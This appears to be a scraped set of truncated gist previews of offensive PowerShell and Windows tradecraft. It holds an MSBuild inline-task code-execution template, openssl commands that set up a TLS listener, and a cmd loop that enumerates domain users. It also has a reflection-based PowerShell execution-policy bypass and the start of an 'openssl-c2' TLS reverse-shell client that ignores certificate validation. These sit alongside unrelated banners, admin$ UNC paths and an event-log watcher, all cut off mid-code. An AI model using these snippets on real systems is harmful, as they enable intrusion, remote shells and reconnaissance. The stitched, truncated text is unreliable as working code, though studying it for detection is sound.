<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml --> | |
<!-- Author: Casey Smith, Twitter: @subTee --> | |
<!-- License: BSD 3-Clause --> | |
<Target Name="Hello"> | |
<FragmentExample /> | |
<ClassExample /> | |
</Target> | |
<UsingTask |
# Create a new 4096-bit RSA key and a self-signed X.509 certificate valid for 365 days.
# -nodes writes key.pem without passphrase encryption, so anyone who can read the file holds the key.
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes | |
# Start a TLS server on TCP port 9876 with that key/certificate pair; -quiet suppresses
# the session and certificate information s_server would otherwise print.
# The certificate is self-signed, so a client can authenticate this server only by pinning cert.pem;
# ordinary chain validation will not succeed.
openssl s_server -quiet -key key.pem -cert cert.pem -port 9876 |
REM Builds %temp%\users.txt, one account name per line, from the output of "net users /domain".
REM Written for an interactive cmd prompt: loop variables use a single percent sign (%a), not the %%a a .bat file needs.
REM Detection note: this is domain account discovery. Process-creation logging shows cmd.exe spawning
REM net.exe with "users /domain" plus findstr, and the 1.txt/2.txt/3.txt/users.txt files appear under %temp%.
REM Step 0: remove leftovers from a previous run; both stdout and stderr are discarded.
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 | |
REM Step 1: skip the first 6 lines of net output, drop any line containing "The command c", and replace
REM every space with a comma. The "call echo %^line...%" form presumably defers expansion until after "set" has run - confirm.
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt | |
REM Step 2: replace each ", " sequence with "," in every line of 1.txt.
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt | |
REM Step 3: take the first three comma-separated tokens of each line and write each on its own line.
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt | |
REM Step 4: drop the "ECHO is on." lines (presumably emitted in step 3 when a token was empty) and write the result to users.txt.
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt |
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ | |
# Disable-ExecutionPolicy: uses reflection to read the non-public "_context" field of
# $executioncontext, then overwrites that object's non-public "_authorizationManager" field
# with a newly constructed System.Management.Automation.AuthorizationManager("Microsoft.PowerShell").
# NOTE(review): the swap is made on the in-memory context object, so it presumably affects only
# the current session - confirm against the linked article.
# Defender note: execution policy is a safety setting rather than an access control, so it cannot
# be relied on to stop this. With script block logging enabled (event ID 4104 in
# Microsoft-Windows-PowerShell/Operational), the field names "_context" and "_authorizationManager"
# appear in the logged text.
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} | |
# Invoke the function immediately so the replacement takes effect as soon as this snippet runs.
Disable-ExecutionPolicy |
function openssl-c2 ($ip,$port,$domain="fake.domain") { | |
$socket = New-Object Net.Sockets.TcpClient($ip, $port) | |
$stream = $socket.GetStream() | |
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) | |
$sslStream.AuthenticateAsClient($domain, $null, "Tls12", $false) | |
$writer = new-object System.IO.StreamWriter($sslStream) | |
$writer.Write('PS ' + (pwd).Path + '> ') | |
$writer.flush() | |
[byte[]]$bytes = 0..65535|%{0}; | |
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0) |
# Fully Qualified DOS Paths (begins with a drive letter, a volume separator, and a component separator) | |
c:\Windows\System32\notepad.exe | |
# UNC Paths (begins with two separators w/o a question mark or period following) | |
\\127.0.0.1\c$\Windows\System32\notepad.exe | |
\\LOCALHOST\c$\Windows\System32\notepad.exe | |
\\::1\c$\Windows\System32\notepad.exe | |
\\0:0:0::1\c$\Windows\System32\notepad.exe | |
\\127.0.0.1\admin$\System32\notepad.exe | |
\\DESKTOP-MH8DLT1\admin$\System32\notepad.exe |
# Banner: stores a block of ASCII art in a here-string ($art) and prints it to the console
# in cyan with Write-Host. Nothing else is read or written.
$art = @" | |
__________ _________.__ .__ .__ _____ .___ _____ _________ | |
\______ \______ _ __ ___________/ _____/| |__ ____ | | | | _/ ____\___________ | | _____/ ____\____ / _____/ ____ ____ | |
| ___/ _ \ \/ \/ // __ \_ __ \_____ \ | | \_/ __ \| | | | \ __\/ _ \_ __ \ | |/ \ __\/ _ \\_____ \_/ __ \_/ ___\ | |
| | ( <_> ) /\ ___/| | \/ \| Y \ ___/| |_| |__ | | ( <_> ) | \/ | | | \ | ( <_> ) \ ___/\ \___ | |
|____| \____/ \/\_/ \___ >__| /_______ /|___| /\___ >____/____/ |__| \____/|__| |___|___| /__| \____/_______ /\___ >\___ > | |
\/ \/ \/ \/ \/ \/ \/ \/ | |
"@ | |
Write-Host -Fore Cyan $art |
## PowerShell Eventing lets you tail an event log: | |
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events | |
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational" | |
Register-ObjectEvent $watcher EventRecordWritten -Action { | |
$event = $eventArgs.EventRecord | |
if($event.ProcessId -ne $pid) | |
{ | |
## Save the last event into a variable in the PowerShell session if you want to explore its properties, | |
## as the eventing actions run in their own runspace | |
# $GLOBAL:lastEvent = $event |
$art = @" | |
,ggg, ,ggggggggggg, ,ggggggggggggggg | |
dP""8I I8 dP"""88""""""Y8, 8I dP""""""88""""""" | |
dP 88 I8 Yb, 88 `8b 8I Yb,_ 88 | |
dP 88 88888888 gg `" 88 ,8P 8I `"" 88 | |
,8' 88 I8 "" 88aaaad8P" 8I 88 | |
d88888888 I8 ,ggggg, ,ggg,,ggg,,ggg, gg ,gggg, 88""""Yb, ,ggg, ,gggg,8I 88 ,ggg, ,gggg,gg ,ggg,,ggg,,ggg, | |
__ ,8" 88 I8 dP" "Y8ggg,8" " |
@echo off | |
SETLOCAL EnableDelayedExpansion | |
FOR /L %%L IN (0,0,1) DO @( | |
REM get UTC times modified from: https://stackoverflow.com/questions/9871499/how-to-get-utc-time-with-windows-batch-file | |
for /f %%a in ('wmic Path Win32_UTCTime get Year^,Month^,Day^,Hour^,Minute^,Second /Format:List ^| findstr "="') do ( | |
set %%a | |
) | |
Set Second=0!Second:~0,-1! | |
Set Second=!Second:~-2! |